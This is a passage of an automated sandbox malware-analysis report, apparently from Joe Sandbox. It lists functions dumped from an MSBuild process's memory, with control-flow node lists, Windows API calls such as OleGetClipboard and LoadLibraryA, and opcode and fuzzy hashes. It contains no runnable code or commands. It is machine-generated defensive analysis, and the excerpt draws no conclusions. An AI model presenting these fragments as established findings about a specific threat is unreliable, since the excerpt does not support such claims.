                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1739 67fab50-67fabba call 67f90b0 call 67f91c8 LdrInitializeThunk 1749 67fad03-67fad20 1739->1749 1750 67fabc0-67fabda 1739->1750 1762 67fad25-67fad2e 1749->1762 1750->1749 1753 67fabe0-67fabfa 1750->1753 1757 67fabfc-67fabfe 1753->1757 1758 67fac00 1753->1758 1759 67fac03-67fac5e 1757->1759 1758->1759 1768 67fac64 1759->1768 1769 67fac60-67fac62 1759->1769 1770 67fac67-67fad01 1768->1770 1769->1770 1770->1762
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.531002054.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67f0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: e8b7465e6cb772e16162edcd5a6d09ae8543e110b8de41943311c253aeb31e22
                                                                                                                                        • Instruction ID: 97767d7620fe548ad49d9ca604d6b1b9a85580a222b4fb5d2f5a9c776cae175f
                                                                                                                                        • Opcode Fuzzy Hash: e8b7465e6cb772e16162edcd5a6d09ae8543e110b8de41943311c253aeb31e22
                                                                                                                                        • Instruction Fuzzy Hash: 0D51C631E102069FCB54EFB0D898AAEB7F5BF84204B148A39E616DB354DF34E804CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 068727A0 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1787 68727a0-68727ab 1788 68727d5-68727eb 1787->1788 1789 68727ad-68727d4 1787->1789 1810 68727ed call 6872791 1788->1810 1811 68727ed call 68727a0 1788->1811 1792 68727f2-68727f4 1793 68727f6-68727f9 1792->1793 1794 68727fa-687282f 1792->1794 1799 6872830-687283d 1794->1799 1799->1799 1800 687283f-6872859 1799->1800 1802 687285f-68728ec GlobalMemoryStatusEx 1800->1802 1803 687285b-687285e 1800->1803 1806 68728f5-687291d 1802->1806 1807 68728ee-68728f4 1802->1807 1807->1806 1810->1792 1811->1792
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 45c34bdd71c01ef9da638c9dba4d03f643fdceb8d1850bc1b27b2c5fbad1b541
                                                                                                                                        • Instruction ID: b6b7af68ac64c9b05b34ee3ed0b3e4ef21168f2bc1b919fc5c3de9cbd3ce40ef
                                                                                                                                        • Opcode Fuzzy Hash: 45c34bdd71c01ef9da638c9dba4d03f643fdceb8d1850bc1b27b2c5fbad1b541
                                                                                                                                        • Instruction Fuzzy Hash: A841E372D043598FCB00DFA9D8443DEBBB5EF89214F15856AD508E7241EB389945CB90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 06876184 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1812 6876184-68761f6 1813 6876201-6876208 1812->1813 1814 68761f8-68761fe 1812->1814 1815 6876213-687624b 1813->1815 1816 687620a-6876210 1813->1816 1814->1813 1817 6876253-68762b2 CreateWindowExW 1815->1817 1816->1815 1818 68762b4-68762ba 1817->1818 1819 68762bb-68762f3 1817->1819 1818->1819 1823 68762f5-68762f8 1819->1823 1824 6876300 1819->1824 1823->1824 1825 6876301 1824->1825 1825->1825
                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 068762A2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 716092398-0
                                                                                                                                        • Opcode ID: d4992743f67a564e068d7e421f430d7db23dd20053db602d66815db49c77d180
                                                                                                                                        • Instruction ID: bef1f179d545fb46739620c0dffe9db85b9b455aebea6a75932bd41def0e69f3
                                                                                                                                        • Opcode Fuzzy Hash: d4992743f67a564e068d7e421f430d7db23dd20053db602d66815db49c77d180
                                                                                                                                        • Instruction Fuzzy Hash: D051C0B1D103499FDF54CFA9C884ADEBBB5FF48314F24812AE819AB250E7759885CF90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 06876190 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1826 6876190-68761f6 1827 6876201-6876208 1826->1827 1828 68761f8-68761fe 1826->1828 1829 6876213-68762b2 CreateWindowExW 1827->1829 1830 687620a-6876210 1827->1830 1828->1827 1832 68762b4-68762ba 1829->1832 1833 68762bb-68762f3 1829->1833 1830->1829 1832->1833 1837 68762f5-68762f8 1833->1837 1838 6876300 1833->1838 1837->1838 1839 6876301 1838->1839 1839->1839
                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 068762A2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 716092398-0
                                                                                                                                        • Opcode ID: 08ef4b98fa5dd6ecb4fb5e5133bbe36d0288d71cb8a36caa5ad9246b3a081261
                                                                                                                                        • Instruction ID: 91f67cb85a5a77bdb3a7e2e07ea088e564b49481855d686f64bce5bee413e046
                                                                                                                                        • Opcode Fuzzy Hash: 08ef4b98fa5dd6ecb4fb5e5133bbe36d0288d71cb8a36caa5ad9246b3a081261
                                                                                                                                        • Instruction Fuzzy Hash: 2541B1B1D107499FDF54CF99C884ADEBBB5FF48314F24812AE819AB210E7759885CF90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 068788D4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1840 68788d4-6878f5c 1843 6878f62-6878f67 1840->1843 1844 687900c-687902c call 68722ac 1840->1844 1845 6878fba-6878ff2 CallWindowProcW 1843->1845 1846 6878f69-6878fa0 1843->1846 1851 687902f-687903c 1844->1851 1848 6878ff4-6878ffa 1845->1848 1849 6878ffb-687900a 1845->1849 1854 6878fa2-6878fa8 1846->1854 1855 6878fa9-6878fb8 1846->1855 1848->1849 1849->1851 1854->1855 1855->1851
                                                                                                                                        APIs
                                                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 06878FE1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CallProcWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2714655100-0
                                                                                                                                        • Opcode ID: 918f6c68a71eb8499c414f83e109e851c86830a739051a859ac36e3a882c1806
                                                                                                                                        • Instruction ID: 488b1c6a4699cd32914015c215a110330226858742f2b629ac4589c3b4302f7d
                                                                                                                                        • Opcode Fuzzy Hash: 918f6c68a71eb8499c414f83e109e851c86830a739051a859ac36e3a882c1806
                                                                                                                                        • Instruction Fuzzy Hash: 7F4129B4A002498FDB54CF99C488AAEBBF6FF88314F14C459E519AB321D774E845CFA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0121CC64 Relevance: 1.6, APIs: 1, Instructions: 90libraryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1857 121cc64-121ccc7 1858 121cd00-121cd4a LoadLibraryA 1857->1858 1859 121ccc9-121ccd3 1857->1859 1864 121cd53-121cd84 1858->1864 1865 121cd4c-121cd52 1858->1865 1859->1858 1860 121ccd5-121ccd7 1859->1860 1862 121ccd9-121cce3 1860->1862 1863 121ccfa-121ccfd 1860->1863 1866 121cce5 1862->1866 1867 121cce7-121ccf6 1862->1867 1863->1858 1871 121cd94 1864->1871 1872 121cd86-121cd8a 1864->1872 1865->1864 1866->1867 1867->1867 1869 121ccf8 1867->1869 1869->1863 1874 121cd95 1871->1874 1872->1871 1873 121cd8c 1872->1873 1873->1871 1874->1874
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 0121CD3A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.526368484.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_1210000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                        • Opcode ID: bdca508e263bada77a9a842bc4b41e32efe3202c171d6a62db3553128d91baa8
                                                                                                                                        • Instruction ID: 5a6da457753b8dde19a18c850c9b66a8f0b01b8cffb986c7afcd324821ac7c04
                                                                                                                                        • Opcode Fuzzy Hash: bdca508e263bada77a9a842bc4b41e32efe3202c171d6a62db3553128d91baa8
                                                                                                                                        • Instruction Fuzzy Hash: 8B3140B4D6028A8FDB14CFA9C88579EBFF5BB18314F148129E806A7284D7789881CF91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01219FDC Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1875 1219fdc-121ccc7 1877 121cd00-121cd4a LoadLibraryA 1875->1877 1878 121ccc9-121ccd3 1875->1878 1883 121cd53-121cd84 1877->1883 1884 121cd4c-121cd52 1877->1884 1878->1877 1879 121ccd5-121ccd7 1878->1879 1881 121ccd9-121cce3 1879->1881 1882 121ccfa-121ccfd 1879->1882 1885 121cce5 1881->1885 1886 121cce7-121ccf6 1881->1886 1882->1877 1890 121cd94 1883->1890 1891 121cd86-121cd8a 1883->1891 1884->1883 1885->1886 1886->1886 1888 121ccf8 1886->1888 1888->1882 1893 121cd95 1890->1893 1891->1890 1892 121cd8c 1891->1892 1892->1890 1893->1893
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 0121CD3A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.526368484.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_1210000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                        • Opcode ID: 8a83a5ae7cf24ba24833cba325ce18926f615105a6eeec2f46bf6230eb09dffd
                                                                                                                                        • Instruction ID: 12c7031c5866f6e9e09212a6190b6740b2286431c2924d1abda86eb096d45533
                                                                                                                                        • Opcode Fuzzy Hash: 8a83a5ae7cf24ba24833cba325ce18926f615105a6eeec2f46bf6230eb09dffd
                                                                                                                                        • Instruction Fuzzy Hash: 5E3162B4D202498FDB14CFA9C88579EBFF4FB18314F10812AE806A7384D7749891CF81
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 06878C24 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2513 6878c24-6879e90 OleGetClipboard 2516 6879e92-6879e98 2513->2516 2517 6879e99-6879ee7 2513->2517 2516->2517 2522 6879ef7 2517->2522 2523 6879ee9-6879eed 2517->2523 2523->2522 2524 6879eef 2523->2524 2524->2522
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Clipboard
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 220874293-0
                                                                                                                                        • Opcode ID: 267fbc730b29f056de62c3a8af9f80f5d89b2a995f0300762b09787b76627c53
                                                                                                                                        • Instruction ID: 631c4ad12913c49fb01decda1850cef348b889038ff26f90ebfe24bd82a83f6a
                                                                                                                                        • Opcode Fuzzy Hash: 267fbc730b29f056de62c3a8af9f80f5d89b2a995f0300762b09787b76627c53
                                                                                                                                        • Instruction Fuzzy Hash: EC31D0B0E0124CDFDB50CF99C884BDEBBF5BB48318F148029E504AB394D7B5A945CBA2
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 06877C68 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2525 6877c68-6877cfc DuplicateHandle 2526 6877d05-6877d22 2525->2526 2527 6877cfe-6877d04 2525->2527 2527->2526
                                                                                                                                        APIs
                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06877CEF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                        • Opcode ID: 00a6eb0310d2c09fb22522e2aa303a343a190a1220206a4c0c0c6bea979df234
                                                                                                                                        • Instruction ID: 562ea69230d25de71a84f3391b9fca61bec25d3dbb4ebc9f5df67c25a5288150
                                                                                                                                        • Opcode Fuzzy Hash: 00a6eb0310d2c09fb22522e2aa303a343a190a1220206a4c0c0c6bea979df234
                                                                                                                                        • Instruction Fuzzy Hash: 5021C2B59012489FDF10CFAAD884ADEBBF8FB48324F14841AE914A7350D374A954CFA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01215038 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2530 1215038-121508a 2534 1215090 2530->2534 2535 121508c-121508e 2530->2535 2536 1215095-12150a0 2534->2536 2535->2536 2537 1215101-121510e 2536->2537 2538 12150a2-12150d3 RtlEncodePointer 2536->2538 2540 12150d5-12150db 2538->2540 2541 12150dc-12150fc 2538->2541 2540->2541 2541->2537
                                                                                                                                        APIs
                                                                                                                                        • RtlEncodePointer.NTDLL(00000000), ref: 012150C2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.526368484.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_1210000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EncodePointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2118026453-0
                                                                                                                                        • Opcode ID: d5004c784c5414946bd6208522ed1c44ed1ad2951e6c076f90a1d49d9b5dfaa4
                                                                                                                                        • Instruction ID: b99ef351613289cb6d3e4f780528abc5e9ff87edddfc215a6ffe29684b219e23
                                                                                                                                        • Opcode Fuzzy Hash: d5004c784c5414946bd6208522ed1c44ed1ad2951e6c076f90a1d49d9b5dfaa4
                                                                                                                                        • Instruction Fuzzy Hash: CB21DE719103868FCB10CFA8C8087DEBFF4FB4A314F14886AD408A3645C7396544CFA2
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01215048 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2553 1215048-121508a 2556 1215090 2553->2556 2557 121508c-121508e 2553->2557 2558 1215095-12150a0 2556->2558 2557->2558 2559 1215101-121510e 2558->2559 2560 12150a2-12150d3 RtlEncodePointer 2558->2560 2562 12150d5-12150db 2560->2562 2563 12150dc-12150fc 2560->2563 2562->2563 2563->2559
                                                                                                                                        APIs
                                                                                                                                        • RtlEncodePointer.NTDLL(00000000), ref: 012150C2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.526368484.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_1210000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EncodePointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2118026453-0
                                                                                                                                        • Opcode ID: a9feda46185bd9f0224f776172082869abf373d8efc77bc4dfb510af9cae32ae
                                                                                                                                        • Instruction ID: 372fa4881b7b5c3da5968d8f5a4f766fa466ff1f149eaf0b3df398b8fd6cebe5
                                                                                                                                        • Opcode Fuzzy Hash: a9feda46185bd9f0224f776172082869abf373d8efc77bc4dfb510af9cae32ae
                                                                                                                                        • Instruction Fuzzy Hash: DC119A7091134A8FCB10DFA9C8087CEBBF4FB89324F10C86AD508A3645DB796544CFA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 068721AC Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 06875216
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                        • Opcode ID: ec94d9d9294caf3d67445c3606874e500051a722ed31f7bc67792428375ec28b
                                                                                                                                        • Instruction ID: f090706ee1151b4c29cd2372ba8a2bc3970ecec3b7a222b69b8611c623f5d7c6
                                                                                                                                        • Opcode Fuzzy Hash: ec94d9d9294caf3d67445c3606874e500051a722ed31f7bc67792428375ec28b
                                                                                                                                        • Instruction Fuzzy Hash: 631102B5D006498FDB10CF9AD444BDEFBF8EB88224F10841AD929B7600D775A545CFA2
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 06878964 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,068792E7), ref: 0687937F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                        • Opcode ID: fea820ba2090b5f905210688aa774cf3a1e76e5c703d4749d704fbb83c7ca6da
                                                                                                                                        • Instruction ID: f8859f949448cd80b7f64f8870de80d5a5b35e1100fcf7e55382c92de292d225
                                                                                                                                        • Opcode Fuzzy Hash: fea820ba2090b5f905210688aa774cf3a1e76e5c703d4749d704fbb83c7ca6da
                                                                                                                                        • Instruction Fuzzy Hash: 2811F2B19042498FCF10DF9AD488B9EFBF8EB88324F15841AD519A7340D775A944CFA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 06878C08 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 06879905
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Initialize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                        • Opcode ID: 7b0ad86770b02f13250f29dc3f04a74a0f4d89d760ebc29bcac95b8c870e9730
                                                                                                                                        • Instruction ID: 12d20e4da2ba7ec1f5ce16cc30aa3c706d0c06e1eb07d25599eb57f206c2c4f4
                                                                                                                                        • Opcode Fuzzy Hash: 7b0ad86770b02f13250f29dc3f04a74a0f4d89d760ebc29bcac95b8c870e9730
                                                                                                                                        • Instruction Fuzzy Hash: DE1122B18042888FDF10CF9AD848BDEBBF8EB48328F14845AD518A7301D374A944CFA2
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 06878C0C Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 06879905
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.531046079.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_6870000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Initialize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                        • Opcode ID: ed88d75834b164492934963bb16d81e874f4ebb9f2ae7e717909994eb7c509f0
                                                                                                                                        • Instruction ID: 32f933d663b6650485235c670399495a71908458635e2dbe3a697aba583da3f1
                                                                                                                                        • Opcode Fuzzy Hash: ed88d75834b164492934963bb16d81e874f4ebb9f2ae7e717909994eb7c509f0
                                                                                                                                        • Instruction Fuzzy Hash: 171100B19002888FDF10DF9AD488BDEBBF8EB48228F14845AD529A7300D374A944CFA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067DF46A Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: P@$m
                                                                                                                                        • API String ID: 0-1480106301
                                                                                                                                        • Opcode ID: 0c79a30ec3a4029f213ff6594b2d89fec2816d8a5ab1ba2f2b5857b13d9a3221
                                                                                                                                        • Instruction ID: 1745cd5aaf46af294d2ca7039c7e2af369aeab5d605fef42f727bb8c31183b16
                                                                                                                                        • Opcode Fuzzy Hash: 0c79a30ec3a4029f213ff6594b2d89fec2816d8a5ab1ba2f2b5857b13d9a3221
                                                                                                                                        • Instruction Fuzzy Hash: 2A31B071B001458FDB54AF74D8646AEB7F2AF88244B148969E447EB368DF39CC42CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067DF478 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: P@$m
                                                                                                                                        • API String ID: 0-1480106301
                                                                                                                                        • Opcode ID: 4a199c8fc57a73bd7c09309dd24a077e8d59fd39c12a480bdae49560cd377820
                                                                                                                                        • Instruction ID: 6803a8a77bcfac32ba8198324f51918b6b6051eab5584d0a5dbd0a4174f632e1
                                                                                                                                        • Opcode Fuzzy Hash: 4a199c8fc57a73bd7c09309dd24a077e8d59fd39c12a480bdae49560cd377820
                                                                                                                                        • Instruction Fuzzy Hash: 3931C071B041458FDB58AF74D4246AEB7F2AF88244B10CA69E407EB358DF39DC41CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0105DA62 Relevance: .5, Instructions: 532COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.525700668.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_105d000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d8f8db432521f8a092950916fbd182a859c84f7e15f1fdbdf1918169cf0927a9
                                                                                                                                        • Instruction ID: 57b4043527796f109afce6f368572e66c7c1930ca5d4b1c11e7b7470f5020f77
                                                                                                                                        • Opcode Fuzzy Hash: d8f8db432521f8a092950916fbd182a859c84f7e15f1fdbdf1918169cf0927a9
                                                                                                                                        • Instruction Fuzzy Hash: 2F4153B25093808FD7479B24C8A0766BFB1DF06214F19C5DBD8C58F293D22A994AD762
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067DEF7F Relevance: .5, Instructions: 458COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4821c57f5ad7ae7f0845e83305bf4b70f2f5bc6cb7a1e2b17cc6d9dd7398730a
                                                                                                                                        • Instruction ID: ae14a3b44f54ae33ea062566298bdf632452670e12dff231f157734e6c99e4ab
                                                                                                                                        • Opcode Fuzzy Hash: 4821c57f5ad7ae7f0845e83305bf4b70f2f5bc6cb7a1e2b17cc6d9dd7398730a
                                                                                                                                        • Instruction Fuzzy Hash: DCE19238B1A3C55FD343D734AC15AA67FF29F96304F1A84A6E548CF2A3D6298C068761
                                                                                                                                        Uniqueness

